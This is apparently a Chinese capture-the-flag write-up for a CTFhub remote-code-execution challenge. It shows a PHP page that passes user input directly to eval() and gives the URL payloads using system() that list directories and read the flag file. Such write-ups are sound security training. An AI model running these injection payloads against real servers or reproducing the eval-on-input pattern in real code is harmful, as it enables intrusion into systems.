技术栈

CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

上一篇:centos7 安装网络文件共享NFS详细过程
下一篇:ChromeDriver 各版本下载地址
相关推荐
百***8445
21 小时前
Webpack、Vite区别知多少?
前端·webpack·node.js
Mintopia
21 小时前
零信任架构下的 WebAIGC 服务安全技术升级方向
前端·人工智能·trae
敏姐的后花园
1 天前
模考倒计时网页版
java·服务器·前端
AiXed
1 天前
PC微信WDA算法
前端·javascript·macos
Dcs
1 天前
Java 中 UnaryOperator 接口与 Lambda 表达式的应用示例
java·后端
bagadesu
1 天前
使用Docker构建Node.js应用的详细指南
java·后端
没有bug.的程序员
1 天前
Spring Cloud Gateway 性能优化与限流设计
java·spring boot·spring·nacos·性能优化·gateway·springcloud
洛_尘
1 天前
JAVA EE初阶 2: 多线程-初阶
java·开发语言
Slow菜鸟
1 天前
Java 开发环境安装指南(五) | Git 安装
java·git
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06《大数据技术原理与应用》实验报告三 熟悉HBase常用操作07jdk21下载、安装(Windows、Linux、macOS)082025 最新教程:注册并切换到美区 Apple ID09综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件10智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践